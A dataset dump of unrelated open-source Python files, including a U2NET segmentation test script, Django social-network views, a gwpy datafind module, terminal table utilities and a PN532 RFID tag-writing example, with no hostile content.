ignore_index=True) \n elif len(sell_code) > 0:\n s1 = ', '.join([\"%d\"%(x) for x in sell_code])\n s2 = ', '.join([\"%d\"%(x) for x in sell_num])\n add_data=add_data.append({'Time': s,'Stocks you sell':s1,'Corresponding number of stocks you sell':s2}, ignore_index=True) \n elif len(buy_code) > 0:\n s1 = ', '.join([\"%d\"%(x) for x in buy_code])\n s2 = ', '.join([\"%d\"%(x) for x in buy_num])\n add_data=add_data.append({'Time': s,'Stocks you buy':s1,'Corresponding number of stocks you buy':s2}, ignore_index=True) \n else:\n add_data=add_data.append({'Time': s}, ignore_index=True)\n\n return add_data","repo_name":"naiqili/it","sub_path":"task2/Wsp6pQGEPp_20181229_13.py","file_name":"Wsp6pQGEPp_20181229_13.py","file_ext":"py","file_size_in_byte":6396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"37388904380","text":"import os\nfrom skimage import io, transform\nimport torch\nimport torchvision\nfrom torch.autograd import Variable\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.utils.data import Dataset, DataLoader\nfrom torchvision import transforms#, utils\nimport collections\n# import torch.optim as optim\n\nimport numpy as np\nfrom PIL import Image\nimport glob\nimport cv2\n\nfrom data_loader_albu import generate_transforms, SalObjDataset, SalObjDatasetT\nfrom albumentations import (\n Compose,\n\tSmallestMaxSize,\n)\n\nfrom model import U2NET # full size version 173.6 MB\nfrom model import U2NETP # small version u2net 4.7 MB\n\n# normalize the predicted SOD probability map\ndef normPRED(d):\n ma = torch.max(d)\n mi = torch.min(d)\n dn = (d-mi) / (ma-mi)\n return dn\n\ndef save_output(image_name, pred, d_dir):\n\n predict = pred\n predict = predict.squeeze()\n predict_np = predict.cpu().data.numpy()\n\n im = Image.fromarray(predict_np * 255).convert('RGB')\n img_name = image_name.split(os.sep)[-1]\n image = io.imread(image_name)\n imo = im.resize((image.shape[1], image.shape[0]), resample=Image.BILINEAR)\n\n pb_np = np.array(imo)\n\n aaa = img_name.split(\".\")\n bbb = aaa[0:-1]\n imidx = bbb[0]\n for i in range(1, len(bbb)):\n imidx = imidx + \".\" + bbb[i]\n\n imo.save(d_dir + imidx + '.png')\n\n######### modified by wjj for more smooth results generate ###########\n# def save_output(image_name, pred, d_dir):\n# img_name = image_name.split(os.sep)[-1]\n# image = cv2.imread(image_name)\n# h, w = image.shape[:2]\n# predict = pred\n# predict = predict.squeeze()\n# predict_np = predict.cpu().data.numpy()\n# predict_np = np.uint8(predict_np * 255)\n# predict_np = cv2.resize(predict_np, (w, h))\n# ret, thresh = cv2.threshold(predict_np, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)\n# kernel = np.ones((3, 3), np.uint8)\n# opening = cv2.morphologyEx(thresh, cv2.MORPH_OPEN, kernel, iterations=2)\n# im = cv2.dilate(opening, kernel, iterations=3) # sure_bg -> im\n# # dist_transform = cv2.distanceTransform(opening, cv2.DIST_L2, 5)\n# # ret, sure_fg = cv2.threshold(dist_transform, 0.7 * dist_transform.max(), 255, 0)\n# # cv2.imwrite('./sure_fg.jpg', sure_fg)\n# # cv2.imwrite('./sure_bg.jpg', sure_bg)\n# # sure_fg = np.uint8(sure_fg)\n# # unknown = cv2.subtract(sure_bg, sure_fg)\n# # cv2.imwrite('./subtract.jpg', unknown)\n# # ret, markers = cv2.connectedComponents(sure_fg)\n# # markers += 1\n# # markers[unknown == 255] = 0\n# # markers = cv2.watershed(image, markers)\n# # image[markers == -1] = [0, 255, 0]\n# # cv2.imwrite('./res.jpg', image)\n\n# # _, im = cv2.threshold(predict_np * 255, 100, 255, cv2.THRESH_BINARY)\n# # im = cv2.resize(im, (w, h))\n# # im /= 255\n# # im = cv2.cvtColor(im, cv2.COLOR_GRAY2BGR)\n# # image = np.uint8(image * im)\n\n# # im = np.uint8(im)\n# im = cv2.cvtColor(im, cv2.COLOR_GRAY2BGR)\n# cv2.bitwise_and(image, im, image)\n# # cv2.imwrite('./res.jpg', image)\n\n# aaa = img_name.split(\".\")\n# bbb = aaa[0:-1]\n# imidx = bbb[0]\n# for i in range(1, len(bbb)):\n# imidx = imidx + \".\" + bbb[i]\n# # cv2.imwrite(d_dir + imidx + 'mask.jpg', predict_np*255)\n# cv2.imwrite(d_dir + imidx + '.jpg', image)\n######### modified ended ###########\n\ndef main():\n\n # --------- 1. get image path and name ---------\n model_name = 'u2netp' # u2netp u2net\n data_dir = '/data2/wangjiajie/datasets/scene_segment1023/u2data/'\n image_dir = os.path.join(data_dir, 'test_imgs')\n prediction_dir = os.path.join('./outputs/', model_name + '/')\n if not os.path.exists(prediction_dir):\n os.makedirs(prediction_dir, exist_ok=True)\n # tra_label_dir = 'test_lbls/'\n\n image_ext = '.jpg'\n # label_ext = '.jpg' # '.png'\n model_dir = os.path.join(os.getcwd(), 'saved_models', model_name, model_name + '.pth')\n\n img_name_list = glob.glob(image_dir + os.sep + '*')\n print(f'test img numbers are: {len(img_name_list)}')\n\n # --------- 2. dataloader ---------\n #1. dataloader\n test_salobj_dataset = SalObjDataset(img_name_list = img_name_list,\n lbl_name_list = [],\n transform=Compose([SmallestMaxSize(max_size=320),])\n )\n test_salobj_dataloader = DataLoader(test_salobj_dataset,\n batch_size=1,\n shuffle=False,\n num_workers=1)\n\n # --------- 3. model define ---------\n if (model_name == 'u2net'):\n print(\"...load U2NET---173.6 MB\")\n net = U2NET(3, 1)\n elif(model_name == 'u2netp'):\n print(\"...load U2NEP---4.7 MB\")\n net = U2NETP(3, 1)\n \n # net.load_state_dict(torch.load(model_dir))\n checkpoint = torch.load(model_dir)\n d = collections.OrderedDict()\n for key, value in checkpoint.items():\n tmp = key[7:]\n d[tmp] = value\n net.load_state_dict(d)\n if torch.cuda.is_available():\n net.cuda()\n net.eval()\n\n # --------- 4. inference for each image ---------\n for i_test, data_test in enumerate(test_salobj_dataloader):\n\n print(\"inferencing:\", img_name_list[i_test].split(os.sep)[-1])\n\n inputs_test = data_test['image']\n inputs_test = inputs_test.type(torch.FloatTensor)\n\n if torch.cuda.is_available():\n inputs_test = Variable(inputs_test.cuda())\n else:\n inputs_test = Variable(inputs_test)\n\n d1, d2, d3, d4, d5, d6, d7= net(inputs_test)\n\n # normalization\n pred = 1.0 - d1[:, 0, :, :]\n pred = normPRED(pred)\n\n # save results to test_results folder\n save_output(img_name_list[i_test], pred, prediction_dir)\n\n del d1, d2, d3, d4, d5, d6, d7\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"trarynight/u2net","sub_path":"multi_u2net_test.py","file_name":"multi_u2net_test.py","file_ext":"py","file_size_in_byte":5913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"24389950001","text":"import json\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.db import IntegrityError\nfrom django.http import HttpResponse, HttpResponseRedirect, JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.shortcuts import render\nfrom django.urls import reverse\nfrom django.core.paginator import Paginator\n\nfrom .models import User, Post\n\n\nfrom . import util \n\ndef index(request):\n return render(request, \"network/index.html\")\n\n\ndef login_view(request):\n if request.method == \"POST\":\n\n # Attempt to sign user in\n username = request.POST[\"username\"]\n password = request.POST[\"password\"]\n user = authenticate(request, username=username, password=password)\n\n # Check if authentication successful\n if user is not None:\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"network/login.html\", {\n \"message\": \"Invalid username and/or password.\"\n })\n else:\n return render(request, \"network/login.html\")\n\n\ndef logout_view(request):\n logout(request)\n return HttpResponseRedirect(reverse(\"index\"))\n\n\ndef register(request):\n if request.method == \"POST\":\n username = request.POST[\"username\"]\n email = request.POST[\"email\"]\n\n # Ensure password matches confirmation\n password = request.POST[\"password\"]\n confirmation = request.POST[\"confirmation\"]\n if password != confirmation:\n return render(request, \"network/register.html\", {\n \"message\": \"Passwords must match.\"\n })\n\n # Attempt to create new user\n try:\n user = User.objects.create_user(username, email, password)\n user.save()\n except IntegrityError:\n return render(request, \"network/register.html\", {\n \"message\": \"Username already taken.\"\n })\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"network/register.html\")\n\n@login_required\ndef publish(request):\n \"\"\"\n Handles a POST request for a new post\n \"\"\"\n # Composing a new post must be via POST\n if request.method != \"POST\":\n return JsonResponse({\"error\": \"POST request required.\"}, status=400)\n \n data = json.loads(request.body)\n user = request.user\n\n post = Post(author=user, body = data['body'])\n print(post)\n post.save()\n\n print(data)\n\n return JsonResponse({\"message\": \"Post created successfully.\"}, status=201)\n\ndef user_posts(request, username):\n page = request.GET.get('page', '1')\n try:\n posts = util.get_all_user_posts(username)\n except User.DoesNotExist:\n return JsonResponse({\"error\": \"User not found.\"}, status=404)\n paginator = Paginator(posts, 10)\n out = paginator.page(page).object_list \n return JsonResponse({\"posts\" : [post.serialize() for post in out],\n \"current_page\": int(page),\n \"num_pages\" : paginator.num_pages},\n safe=False)\ndef all_posts(request):\n page = request.GET.get('page', '1')\n posts = Post.objects.all().order_by('-timestamp_created')\n paginator = Paginator(posts, 10)\n out = paginator.page(page).object_list \n return JsonResponse({\"posts\" : [post.serialize() for post in out],\n \"current_page\": page,\n \"num_pages\" : paginator.num_pages},\n safe=False)\n\n@csrf_exempt\ndef post(request, post_id):\n \"\"\"\n Handles GET and PUT requests to get or edit the post with the id. When successful,\n both return the current post in JSON form.\n \"\"\"\n # Query for requested post\n try:\n post = Post.objects.get(pk=post_id)\n except Post.DoesNotExist:\n return JsonResponse({\"error\": \"Post not found.\"}, status=404)\n if request.method == 'GET':\n return JsonResponse(post.serialize())\n \n if request.method == 'PUT':\n if not request.user.is_authenticated:\n return JsonResponse({'error': 'User must be authenticated to like'})\n\n data = json.loads(request.body)\n print(data)\n\n if data.get(\"body\") is not None:\n # User wants to update body\n if request.user != post.author:\n return JsonResponse({\"error\": \"Must be the owner of the post to modify it!\"})\n post.body = data.get(\"body\")\n post.save()\n return JsonResponse(post.serialize(), safe=True)\n \n if data.get(\"like\") is not None:\n try:\n liked = post.users_who_liked.get(pk=request.user.id)\n # if the user has liked the post already, remove them\n post.users_who_liked.remove(liked)\n post.save()\n except User.DoesNotExist:\n # if user hasn't liked it, add them to the list of likers\n post.users_who_liked.add(request.user)\n post.save()\n return JsonResponse(post.serialize(), safe=True)\n\n@login_required\ndef following_posts(request):\n username = request.user.username\n if request.method != 'GET':\n return JsonResponse({'error': 'Request to following feed must be a GET'})\n try:\n posts = util.get_all_following_posts(username)\n except User.DoesNotExist:\n return JsonResponse({\"error\": \"User not found.\"}, status=404)\n page = request.GET.get('page', '1') \n paginator = Paginator(posts, 10)\n out = paginator.page(page).object_list \n return JsonResponse({\"posts\" : [post.serialize() for post in out],\n \"current_page\": page,\n \"num_pages\" : paginator.num_pages},\n safe=False) \n\n@login_required\ndef user(request, username):\n \"\"\"\n Handles GET and PUT requests to get or edit the user with the username. When successful,\n both return the current post in JSON form.\n \"\"\"\n # Query for requested post\n try:\n queried_user = User.objects.get(username=username)\n except User.DoesNotExist:\n return JsonResponse({\"error\": \"User not found.\"}, status=404)\n if request.method == 'GET':\n return JsonResponse(queried_user.serialize())\n \n if request.method == 'PUT':\n if not request.user.is_authenticated:\n return JsonResponse({'error': 'User must be authenticated to change user info'})\n data = json.loads(request.body)\n\n if data.get(\"follow\") is not None:\n if request.user.id == queried_user.id:\n return JsonResponse({'error': 'Cannot follow self!'})\n try:\n queried_user.followers.get(pk=request.user.id)\n # if the user has followed, remove them\n queried_user.followers.remove(request.user)\n queried_user.save()\n except User.DoesNotExist:\n # if user hasn't followed, follow\n queried_user.followers.add(request.user)\n queried_user.save()\n return JsonResponse(queried_user.serialize(), safe=True)","repo_name":"ajnipp/network","sub_path":"network/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"20778638443","text":"#!/usr/bin/env python3\n# _*_ coding:utf-8 _*_\n#\n# Author: Payne Zheng \n# Date: 2019/7/31\n# Location: DongGuang\n# Desc: do the right thing\n\n\"\"\"\n信号量也是一把锁,可以指定信号量为5,\n对比互斥锁同一时间只能有一个任务抢到锁去执行,信号量同一时间可以有5个任务拿到锁去执行\n\"\"\"\nimport time\nfrom threading import Thread, Semaphore, currentThread, activeCount\n\nsm = Semaphore(3) # 信号量锁对象(允许同时三个线程拿到锁)\n\ndef task():\n with sm: # sm.acquire; sm.release\n print(f'{currentThread().name} is work...')\n print(f'activeCount: {activeCount()}')\n time.sleep(3)\n print(f'{currentThread().name} is done...')\n\n\nif __name__ == \"__main__\":\n for i in range(10):\n t = Thread(target=task)\n t.start()\n\n","repo_name":"PAYNE1Z/python-learn","sub_path":"luffycity-s8/第四模块_并发编程/13_信号量.py","file_name":"13_信号量.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"6150206022","text":"from unittest import TestCase\nfrom unittest.mock import create_autospec\n\nfrom python_dice.interface.constraint.i_constraint_factory import IConstraintFactory\nfrom python_dice.interface.constraint.i_constraint_merger import IConstraintMerger\nfrom python_dice.interface.constraint.i_constraint_set import IConstraintSet\nfrom python_dice.src.constraint.constraint_set_factory import ConstraintSetFactory\n\n\nclass TestConstraintSetFactory(TestCase):\n def test_create_constraint_set(self):\n constraint_set_factory = ConstraintSetFactory()\n self.assertIsInstance(constraint_set_factory.create_constraint_set(), IConstraintSet)\n\n @staticmethod\n def test_uses_constraint_merger():\n mock_constraint_merger = create_autospec(IConstraintMerger)\n constraint_set_factory = ConstraintSetFactory(constraint_merger=mock_constraint_merger)\n constraint_set_factory.create_constraint_set()\n mock_constraint_merger.merge_new_constraints.assert_called_once()\n\n def test_uses_constraint_factory(self):\n mock_constraint_factory = create_autospec(IConstraintFactory)\n constraint_set_factory = ConstraintSetFactory(constraint_factory=mock_constraint_factory)\n new_set = constraint_set_factory.create_constraint_set()\n self.assertEqual({mock_constraint_factory.null_constraint}, set(new_set.constraints))\n","repo_name":"markbrockettrobson/python_dice","sub_path":"python_dice/test/constraint/test_constraint_set_factory.py","file_name":"test_constraint_set_factory.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"94"} +{"seq_id":"456301844","text":"import os.path\n\nfrom glue.lal import CacheEntry\n\nfrom .. import version\nfrom ..time import to_gps\nfrom ..utils import with_import\n\n__version__ = version.version\n__author__ = 'Duncan Macleod '\n\n\n@with_import('glue.datafind')\ndef connect(host=None, port=None):\n \"\"\"Open a new datafind connection\n\n Parameters\n ----------\n host : `str`\n name of datafind server to query\n port : `int`\n port of datafind server on host\n\n Returns\n -------\n connection : `~glue.datafind.GWDataFindHTTPConnection`\n the new open connection\n \"\"\"\n port = port and int(port)\n if port is not None and port != 80:\n cert, key = datafind.find_credential()\n return datafind.GWDataFindHTTPSConnection(\n host=host, port=port, cert_file=cert, key_file=key)\n else:\n return datafind.GWDataFindHTTPConnection(host=host, port=port)\n\n\ndef find_frametype(channel, gpstime=None, frametype_match=None,\n host=None, port=None, return_all=False, exclude_tape=False):\n \"\"\"Find the frametype(s) that hold data for a given channel\n \"\"\"\n from ..detector import Channel\n channel = Channel(channel)\n name = channel.name\n if gpstime is not None:\n gpstime = to_gps(gpstime).seconds\n connection = connect(host, port)\n types = connection.find_types(channel.ifo[0], match=frametype_match)\n # get reference frame for all types\n frames = []\n for ft in types:\n try:\n if gpstime is None:\n frame = connection.find_latest(\n channel.ifo[0], ft, urltype='file')[0]\n else:\n frame = connection.find_frame_urls(\n channel.ifo[0], ft, gpstime, gpstime, urltype='file',\n on_gaps='ignore')[0]\n except (IndexError, RuntimeError):\n continue\n else:\n if os.access(frame.path, os.R_OK) and (\n not exclude_tape or not on_tape(frame)):\n frames.append((ft, frame.path))\n # sort frames by allocated block size and regular size\n # (to put frames on tape at the bottom of the list)\n frames.sort(key=lambda x: (on_tape(x[1]), num_channels(x[1])))\n # search each frametype for the given channel\n found = []\n for ft, path in frames:\n if get_channel_type(name, path):\n if not return_all:\n return ft\n else:\n found.append(ft)\n if len(found) == 0 and gpstime:\n raise ValueError(\"Cannot locate %r in any known frametype at GPS=%d\"\n % (name, gpstime))\n elif len(found) == 0:\n raise ValueError(\"Cannot locate %r in any known frametype\" % name)\n else:\n return found\n\n\n@with_import('lalframe')\ndef num_channels(framefile):\n \"\"\"Find the total number of channels in this framefile\n \"\"\"\n frfile = lalframe.FrameUFrFileOpen(framefile, \"r\")\n frtoc = lalframe.FrameUFrTOCRead(frfile)\n return sum(\n getattr(lalframe, 'FrameUFrTOCQuery%sN' % type_.title())(frtoc) for\n type_ in ['adc', 'proc', 'sim'])\n\n\n@with_import('lalframe')\ndef get_channel_type(channel, framefile):\n \"\"\"Find the channel type in a given frame file\n\n Parameters\n ----------\n channel : `str`, `~gwpy.detector.Channel`\n name of data channel to find\n framefile : `str`\n path of GWF file in which to search\n\n Returns\n -------\n ctype : `str`\n the type of the channel ('adc', 'sim', or 'proc') if the\n channel exists in the table-of-contents for the given frame,\n otherwise `False`\n \"\"\"\n name = str(channel)\n # read frame and table of contents\n frfile = lalframe.FrameUFrFileOpen(framefile, \"r\")\n frtoc = lalframe.FrameUFrTOCRead(frfile)\n for type_ in ['sim', 'proc', 'adc']:\n query = getattr(lalframe, 'FrameUFrTOCQuery%sName' % type_.title())\n i = 0\n while True:\n try:\n c = query(frtoc, i)\n except RuntimeError:\n break\n else:\n if c == name:\n return type_\n i += 1\n return False\n\n\ndef find_best_frametype(channel, start, end, urltype='file',\n host=None, port=None, allow_tape=True):\n \"\"\"Intelligently select the best frametype from which to read this channel\n \"\"\"\n start = to_gps(start).seconds\n end = to_gps(end).seconds\n frametype = find_frametype(channel, gpstime=start, host=host, port=port,\n exclude_tape=not allow_tape)\n connection = connect(host=host, port=port)\n try:\n cache = connection.find_frame_urls(channel[0], frametype,\n start, end, urltype=urltype,\n on_gaps='error')\n if not allow_tape and on_tape(*cache):\n raise RuntimeError()\n except RuntimeError:\n alltypes = find_frametype(channel, gpstime=start, host=host, port=port,\n return_all=True, exclude_tape=not allow_tape)\n cache = [(ft, connection.find_frame_urls(\n channel[0], ft, start, end, urltype=urltype,\n on_gaps='ignore')) for ft in alltypes]\n if not allow_tape:\n cache = [ftc for ftc in cache if not on_tape(*ftc[1])]\n cache.sort(key=lambda x:\n len(x[1]) and -abs(x[1].to_segmentlistdict().values()[0]) or 0)\n try:\n return cache[0][0]\n except IndexError:\n raise ValueError(\"Cannot find any valid frametypes for %r\"\n % channel)\n else:\n return frametype\n\n\ndef on_tape(*files):\n \"\"\"Determine whether any of the given files are on tape\n\n Parameters\n ----------\n *files : `str`, `~glue.lal.CacheEntry`\n one or more paths to GWF files\n\n Returns\n -------\n True/False : `bool`\n `True` if any of the files are determined to be on tape,\n otherwise `False`\n \"\"\"\n for f in files:\n if isinstance(f, CacheEntry):\n f = f.path\n if os.stat(f).st_blocks == 0:\n return True\n return False\n","repo_name":"garywu921207/gwpy","sub_path":"gwpy/io/datafind.py","file_name":"datafind.py","file_ext":"py","file_size_in_byte":6181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"94"} +{"seq_id":"32262366807","text":"import sys\nimport os\nimport re\nfrom operator import itemgetter\n\n\ndef print_stdout(command):\n \"\"\"\n Print commands to stdout, which are then interpreted by shell.\n\n :param command: string, command to be interpreted by shell\n :return: None\n \"\"\"\n sys.stdout.write(\"%s\\n\" % command)\n sys.stdout.flush()\n\n\ndef print_stderr(message):\n \"\"\"\n Print message to stderr, which WILL NOT be interpreted by shell.\n This function is also utilized to print banners and tables.\n\n :param message: string, message to write to stderr\n :return: None\n \"\"\"\n sys.stderr.write(\"%s\\n\" % message)\n sys.stderr.flush()\n\n\ndef split_list(raw_list, num_group, algorithm=\"remainder\"):\n \"\"\"\n Split given list into different groups.\n\n Two algorithms are implemented: by the remainder of the index of each\n element divided by the number of group, or the range of index. For example,\n if we are to split the list of [0, 1, 2, 3] into two groups, by remainder\n we will get [[0, 2], [1, 3]] while by range we will get [[0, 1], [2, 3]].\n\n :param raw_list: list to split\n :param num_group: integer, number of groups\n :param algorithm: string, should be either \"remainder\" or \"range\"\n :return: a list containing the split list\n \"\"\"\n assert num_group in range(1, len(raw_list)+1)\n assert algorithm in (\"remainder\", \"range\")\n num_element = len(raw_list)\n if algorithm == \"remainder\":\n list_split = [[raw_list[i] for i in range(num_element)\n if i % num_group == k] for k in range(num_group)]\n else:\n # Get the numbers of items for each group\n num_item = [num_element // num_group for i in range(num_group)]\n for i in range(num_element % num_group):\n num_item[i] += 1\n # Divide the list according to num_item\n list_split = []\n for i in range(num_group):\n j0 = sum(num_item[:i])\n j1 = j0 + num_item[i]\n list_split.append([raw_list[j] for j in range(j0, j1)])\n return list_split\n\n\ndef get_terminal_size():\n \"\"\"\n Get the current size of the terminal in characters. We do not use\n os.get_terminal_size() as it is available only in Python 3.\n\n :return: (integer, integer), size of the terminal\n \"\"\"\n rows, columns = os.popen('stty size', 'r').read().split()\n return int(rows), int(columns)\n\n\ndef print_banner(banner, columns):\n \"\"\"\n Print a banner like --------------- FOO ------------------ to stderr.\n\n The number '2' in this piece of code counts for the two spaces wrapping the\n central text.\n\n :param banner: the central text in the banner\n :param columns: total width of the banner\n :return: None\n \"\"\"\n if len(banner) + 2 > columns:\n print_stderr(banner)\n else:\n num_marks_total = columns - len(banner) - 2\n num_marks_left = num_marks_total // 2 \n num_marks_right = num_marks_total - num_marks_left\n banner_with_marks = \"\"\n mark = \"-\"\n for i in range(num_marks_left):\n banner_with_marks += mark\n banner_with_marks += \" %s \" % banner\n for i in range(num_marks_right):\n banner_with_marks += mark\n print_stderr(banner_with_marks)\n\n\ndef print_table(table_head, table_body, number_items=True):\n \"\"\"\n Print a table to stderr.\n\n :param table_head: string, head of the table\n :param table_body: list of strings\n :param number_items: boolean, whether to number the items in table_body\n :return: None\n \"\"\"\n rows, columns = get_terminal_size()\n\n # Print table head\n print_stderr(\"\")\n print_banner(table_head, columns)\n\n # Print table body\n if len(table_body) == 0:\n print_stderr(\"None\\n\")\n else:\n # Get the maximum length of string with reserved spaces.\n # DO NOT CHANGE THE NUMBER of RESERVED SPACES.\n max_length = max([len(string) for string in table_body])\n if not number_items:\n max_length += 2\n else:\n max_length += 6\n\n # Determine the number of columns and rows of the table\n num_table_column = columns // max_length\n num_table_row = len(table_body) // num_table_column\n if len(table_body) % num_table_column > 0:\n num_table_row += 1\n\n # Break table_body into rows and print\n table_rows = split_list(table_body, num_table_row)\n if not number_items:\n for row in table_rows:\n for string in row:\n fmt = \"%-\" + str(max_length) + \"s\"\n sys.stderr.write(fmt % string)\n sys.stderr.write(\"\\n\")\n sys.stderr.write(\"\\n\")\n sys.stderr.flush()\n else:\n # Determine the dimension of the transposed table, for numbering\n # the items\n table_dim_trans = []\n for i in range(num_table_column):\n if i < len(table_rows[-1]):\n table_dim_trans.append(num_table_row)\n else:\n table_dim_trans.append(num_table_row - 1)\n\n # Print the table with numbered items\n for i, row in enumerate(table_rows):\n for j, string in enumerate(row):\n fmt = \"%4d) %-\" + str(max_length-6) + \"s\"\n item_number = sum(table_dim_trans[:j]) + i + 1\n sys.stderr.write(fmt % (item_number, string))\n sys.stderr.write(\"\\n\")\n sys.stderr.write(\"\\n\")\n sys.stderr.flush()\n\n\ndef print_list(list_head, list_body, number_items=True):\n \"\"\"\n Prints a list to stderr.\n\n :param list_head: string, head of the list\n :param list_body: list of strings\n :param number_items: boolean, whether to number the items\n :return:\n \"\"\"\n sys.stderr.write(\"%s: \" % list_head)\n if len(list_body) == 0:\n sys.stderr.write(\"None\")\n else:\n if number_items:\n for i, item in enumerate(list_body):\n sys.stderr.write(\"%4d) %s\" % (i+1, item))\n else:\n for i, item in enumerate(list_body):\n sys.stderr.write(\" %s\" % item)\n sys.stderr.write(\"\\n\")\n sys.stderr.flush()\n\n\ndef get_latest_version(versions):\n \"\"\"\n Get the latest version for given software.\n :param versions: list of string, different versions of the software, each\n version should be in the form of\n [a-zA-Z0-9]+[-/]+[0-9\\.]+.?\n :return: string, the latest version of this software\n \"\"\"\n # Extract and normalize version numbers from software names\n ver_str = [re.search(r\"[0-9\\.]+\", ver).group().split(\".\")\n for ver in versions]\n ver_num = [[int(i) for i in ver if i != \"\"] for ver in ver_str]\n num_digit = max([len(ver) for ver in ver_num])\n for ver in ver_num:\n while len(ver) < num_digit:\n ver.append(0)\n\n # Sort version numbers\n ver_num = sorted(ver_num, key=itemgetter(slice(0, num_digit, 1)))\n\n # Get the software name corresponding to the latest version\n latest_version = sorted(versions)[-1]\n for ver_check in versions:\n ver_str_check = re.search(r\"[0-9\\.]+\", ver_check).group().split(\".\")\n ver_num_check = [int(i) for i in ver_str_check if i != \"\"]\n while len(ver_num_check) < num_digit:\n ver_num_check.append(0)\n difference = [abs(ver_num_check[i] - ver_num[-1][i])\n for i in range(num_digit)]\n if sum(difference) == 0:\n latest_version = ver_check\n break\n return latest_version\n\n\ndef str2list(string, separator=\",\"):\n \"\"\"\n Split a string into a list according to specified separator and remove\n empty elements.\n\n :param string: string to split\n :param separator: separator, should not be a space\n :return: list containing the segments\n \"\"\"\n string_trimmed = string.replace(\"\\n\", \"\").replace(\" \", \"\")\n string_list = [s for s in string_trimmed.split(separator) if s != \"\"]\n return string_list\n\n\ndef str2env(string_list):\n \"\"\"\n Convert the strings in a list to the form of (command, env_name, pattern).\n See the \"environ\" attribute of \"Module\" class for more details.\n\n :param string_list: list of strings to be parsed\n :return: list of tuples in the form of (command, env_name, pattern).\n \"\"\"\n environ = [tuple(s.split()) for s in string_list]\n return environ\n","repo_name":"yhli1016/Pmod","sub_path":"pmod/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":8420,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"31126073276","text":"#!/usr/bin/env python\n\nimport sys\nimport argparse\nfrom Bio import SeqIO\n# changed calling the function to work better with symbolic links\nfrom seq_functions.seq_funcs import *\n\nparser = argparse.ArgumentParser(description='extract sequences from a list of IDs')\n\nparser.add_argument('-s', '--sequence_file', dest='seqfile',\n type=str,\n help=\"name of sequence file to source\")\nparser.add_argument('-o', '--output', dest='output', \n type=str, help=\"file name for extracted sequences (optional)\")\nparser.add_argument('-l', '--listfile', dest='listing', \n type=str, help=\"file listing seq IDs to extract (one per line)\")\nparser.add_argument('-q', '--fastq', dest='fastq', action='store_true', \n help=\"add -q or --fastq arg is file is fastq (default fasta)\")\n\nargs = parser.parse_args()\ninfile = args.seqfile\noutseq = args.output\nlistfile = args.listing\nfastqfmt = args.fastq\n\nif args.fastq:\n seqtype = 'fastq'\nelse:\n seqtype = 'fasta'\n\nseqlist = make_list(listfile)\n\nseq_set = set(seqlist)\n\nif args.output:\n\n extract_seqs(seq_set, infile, seqtype, outseq)\n\nelse:\n extract_seqs(seq_set, infile, seqtype)\n\nprint(\"all done\")\n\n\n","repo_name":"hughcross/seq_tools","sub_path":"seq_extractor.py","file_name":"seq_extractor.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"5620257039","text":"\"\"\"\nThis example shows connecting to the PN532 and writing & reading a mifare classic\ntype RFID tag\n\"\"\"\nimport time\nimport os\nimport unicodedata\n\nimport audio\nimport board\nimport busio\n\nfrom adafruit_pn532.spi import PN532_SPI\nimport digitalio\nfrom digitalio import DigitalInOut\nimport RPi.GPIO as GPIO\n\nfrom adafruit_pn532.adafruit_pn532 import MIFARE_CMD_AUTH_B\n\nspi = busio.SPI(board.SCK, board.MOSI, board.MISO)\nspi.try_lock()\nspi.configure(baudrate=12000000)\nspi.unlock()\n\nreader1_pin = DigitalInOut(board.D24)\npn532 = PN532_SPI(spi, reader1_pin, debug=False)\nic, ver, rev, support = pn532.firmware_version\npn532.SAM_configuration()\n\n\nic, ver, rev, support = pn532.firmware_version\nprint(\"Found PN532 with firmware version: {0}.{1}\".format(ver, rev))\n\n# Configure PN532 to communicate with MiFare cards\npn532.SAM_configuration()\n\nprint(\"Waiting for RFID/NFC card to write to!\")\n\nkey = b\"\\xFF\\xFF\\xFF\\xFF\\xFF\\xFF\"\n\nwhile True:\n # Check if a card is available to read\n uid = pn532.read_passive_target(timeout=0.5)\n print(\".\", end=\"\")\n # Try again if no card is available.\n if uid is not None:\n break\n\nprint(\"\")\n\nprint(\"Found card with UID:\", [hex(i) for i in uid])\n\n#mifare 1K layout (chip + card)\n# 1 kByte\n\n# 16 Sektoren zu je 4 Blöcken (16 Bytes/16 Ascii Characters pro Block)\n\n#writeable blocks (https://support.ccs.com.ph/portal/en/kb/articles/mifare-classic-1k-memory-structure)\n# 4, 5, 6\n# 8, 9, 0A,\n# 0C, 0D, 0E,...\n\n#allow only 16 ascii characters, so i only need one block (block 4)\n# 2 characters for prefix \"en\", 1 for suffix \"#\", so my word can have 13 characters!\n\nprint(\"Authenticating block 4 ...\")\nauthenticated = pn532.mifare_classic_authenticate_block(uid, 4, MIFARE_CMD_AUTH_B, key)\nif not authenticated:\n print(\"Authentication failed!\")\n\n\ndata = bytearray(16)\n\nlang = \"en\"\nmessage = \"MANFREd\" #can be 13 characters long\nendofmessage = \"#\"\nmessage = lang+message+endofmessage\n\ndata[0:len(message)] = message.encode()\n\nprint(data)\n\n# Set 16 bytes of block to 0xFEEDBEEF\n#data = bytearray(16)\n#data[0:16] = 